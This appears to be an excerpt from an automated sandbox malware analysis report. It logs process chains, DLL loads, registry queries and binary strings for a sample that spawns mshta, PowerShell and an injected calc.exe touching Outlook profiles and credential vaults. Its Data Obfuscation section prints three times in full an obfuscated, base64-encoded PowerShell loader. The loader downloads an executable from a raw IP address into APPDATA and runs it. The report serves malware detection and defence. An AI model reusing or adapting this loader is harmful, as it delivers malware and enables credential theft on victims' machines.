                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeProcess created: C:\Windows\SysWOW64\calc.exe "C:\Windows\SysWOW64\calc.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: ieframe.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: winsqlite3.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                  Source: Binary string: calc.pdbGCTL source: svchost.exe, 00000007.00000003.1651170470.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1651036619.000000000301A000.00000004.00000020.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000003.1620980752.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000003.1620980752.00000000006C9000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: q8C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.pdb source: powershell.exe, 00000003.00000002.1482495416.0000000004B88000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: cosses.exe, 00000006.00000003.1469858707.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, cosses.exe, 00000006.00000003.1470158953.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1578771387.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1685711194.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1685711194.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1581466750.0000000003400000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 0000000C.00000002.3817940779.000000000540E000.00000040.00001000.00020000.00000000.sdmp, calc.exe, 0000000C.00000003.1684130766.0000000004F0A000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 0000000C.00000002.3817940779.0000000005270000.00000040.00001000.00020000.00000000.sdmp, calc.exe, 0000000C.00000003.1687074462.00000000050BC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: calc.pdb source: svchost.exe, 00000007.00000003.1651170470.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1651036619.000000000301A000.00000004.00000020.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000003.1620980752.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000003.1620980752.00000000006C9000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: cosses.exe, 00000006.00000003.1469858707.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, cosses.exe, 00000006.00000003.1470158953.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000003.1578771387.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1685711194.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1685711194.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1581466750.0000000003400000.00000004.00000020.00020000.00000000.sdmp, calc.exe, calc.exe, 0000000C.00000002.3817940779.000000000540E000.00000040.00001000.00020000.00000000.sdmp, calc.exe, 0000000C.00000003.1684130766.0000000004F0A000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 0000000C.00000002.3817940779.0000000005270000.00000040.00001000.00020000.00000000.sdmp, calc.exe, 0000000C.00000003.1687074462.00000000050BC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000000.1602639905.000000000052F000.00000002.00000001.01000000.0000000A.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000000.1753260388.000000000052F000.00000002.00000001.01000000.0000000A.sdmp

                  Data Obfuscation

                  barindex
                  PowerShell case anomaly found
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'JGoxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlcmRFRmlOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtmLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiaGZ1dnVwcENOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1YmpCb2gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdXRNSGFlLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnZ3dvdmVvT1hKKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJMIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRoblIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkajE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNC81MzAvY29zc2VzLmV4ZSIsIiRFblY6QVBQREFUQVxjb3NzZXMuZXhlIiwwLDApO3N0YVJ0LVNsRUVQKDMpO2ludk9rZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcY29zc2VzLmV4ZSI='+[Char]34+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'JGoxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlcmRFRmlOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtmLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiaGZ1dnVwcENOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1YmpCb2gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdXRNSGFlLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnZ3dvdmVvT1hKKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJMIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRoblIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkajE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNC81MzAvY29zc2VzLmV4ZSIsIiRFblY6QVBQREFUQVxjb3NzZXMuZXhlIiwwLDApO3N0YVJ0LVNsRUVQKDMpO2ludk9rZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcY29zc2VzLmV4ZSI='+[Char]34+'))')))"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'JGoxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlcmRFRmlOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtmLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiaGZ1dnVwcENOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1YmpCb2gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdXRNSGFlLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnZ3dvdmVvT1hKKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJMIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRoblIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkajE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNC81MzAvY29zc2VzLmV4ZSIsIiRFblY6QVBQREFUQVxjb3NzZXMuZXhlIiwwLDApO3N0YVJ0LVNsRUVQKDMpO2ludk9rZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcY29zc2VzLmV4ZSI='+[Char]34+'))')))"Jump to behavior
